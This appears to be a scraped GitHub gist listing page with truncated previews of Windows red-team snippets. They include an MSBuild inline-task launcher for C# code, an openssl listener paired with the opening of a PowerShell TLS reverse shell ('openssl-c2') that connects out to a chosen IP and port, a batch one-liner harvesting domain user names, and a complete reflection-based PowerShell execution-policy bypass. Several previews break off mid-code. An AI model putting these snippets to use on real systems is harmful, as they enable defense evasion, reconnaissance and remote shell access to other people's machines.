This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes c# code. --> | |
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml --> | |
<!-- Author: Casey Smith, Twitter: @subTee --> | |
<!-- License: BSD 3-Clause --> | |
<Target Name="Hello"> | |
<FragmentExample /> | |
<ClassExample /> | |
</Target> | |
<UsingTask |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes | |
openssl s_server -quiet -key key.pem -cert cert.pem -port 9876 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1 | |
@FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line: =,% >> %temp%\1.txt | |
@FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt | |
@FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt | |
@FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# from https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ | |
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))} | |
Disable-ExecutionPolicy |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function openssl-c2 ($ip,$port,$domain="fake.domain") { | |
$socket = New-Object Net.Sockets.TcpClient($ip, $port) | |
$stream = $socket.GetStream() | |
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])) | |
$sslStream.AuthenticateAsClient($domain, $null, "Tls12", $false) | |
$writer = new-object System.IO.StreamWriter($sslStream) | |
$writer.Write('PS ' + (pwd).Path + '> ') | |
$writer.flush() | |
[byte[]]$bytes = 0..65535|%{0}; | |
while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Fully Qualified DOS Paths (begins with a drive letter, a volume separator, and a component separator) | |
c:\Windows\System32\notepad.exe | |
# UNC Paths (begins with two separators w/o a question mark or period following) | |
\\127.0.0.1\c$\Windows\System32\notepad.exe | |
\\LOCALHOST\c$\Windows\System32\notepad.exe | |
\\::1\c$\Windows\System32\notepad.exe | |
\\0:0:0::1\c$\Windows\System32\notepad.exe | |
\\127.0.0.1\admin$\System32\notepad.exe | |
\\DESKTOP-MH8DLT1\admin$\System32\notepad.exe |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$art = @" | |
__________ _________.__ .__ .__ _____ .___ _____ _________ | |
\______ \______ _ __ ___________/ _____/| |__ ____ | | | | _/ ____\___________ | | _____/ ____\____ / _____/ ____ ____ | |
| ___/ _ \ \/ \/ // __ \_ __ \_____ \ | | \_/ __ \| | | | \ __\/ _ \_ __ \ | |/ \ __\/ _ \\_____ \_/ __ \_/ ___\ | |
| | ( <_> ) /\ ___/| | \/ \| Y \ ___/| |_| |__ | | ( <_> ) | \/ | | | \ | ( <_> ) \ ___/\ \___ | |
|____| \____/ \/\_/ \___ >__| /_______ /|___| /\___ >____/____/ |__| \____/|__| |___|___| /__| \____/_______ /\___ >\___ > | |
\/ \/ \/ \/ \/ \/ \/ \/ | |
"@ | |
Write-Host -Fore Cyan $art |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## PowerShell Eventing lets you tail an event log: | |
## http://powershellcookbook.com/recipe/IMyz/respond-to-automatically-generated-events | |
$watcher = New-Object System.Diagnostics.Eventing.Reader.EventLogWatcher "Microsoft-Windows-PowerShell/Operational" | |
Register-ObjectEvent $watcher EventRecordWritten -Action { | |
$event = $eventArgs.EventRecord | |
if($event.ProcessId -ne $pid) | |
{ | |
## Save the last event into a variable in the PowerShell sesssion if you want to explore its properties, | |
## as the eventing actions run in their own runspace | |
# $GLOBAL:lastEvent = $event |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$art = @" | |
,ggg, ,ggggggggggg, ,ggggggggggggggg | |
dP""8I I8 dP"""88""""""Y8, 8I dP""""""88""""""" | |
dP 88 I8 Yb, 88 `8b 8I Yb,_ 88 | |
dP 88 88888888 gg `" 88 ,8P 8I `"" 88 | |
,8' 88 I8 "" 88aaaad8P" 8I 88 | |
d88888888 I8 ,ggggg, ,ggg,,ggg,,ggg, gg ,gggg, 88""""Yb, ,ggg, ,gggg,8I 88 ,ggg, ,gggg,gg ,ggg,,ggg,,ggg, | |
__ ,8" 88 I8 dP" "Y8ggg,8" " |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
SETLOCAL EnableDelayedExpansion | |
FOR /L %%L IN (0,0,1) DO @( | |
REM get UTC times modified from: https://stackoverflow.com/questions/9871499/how-to-get-utc-time-with-windows-batch-file | |
for /f %%a in ('wmic Path Win32_UTCTime get Year^,Month^,Day^,Hour^,Minute^,Second /Format:List ^| findstr "="') do ( | |
set %%a | |
) | |
Set Second=0!Second:~0,-1! | |
Set Second=!Second:~-2! |
NewerOlder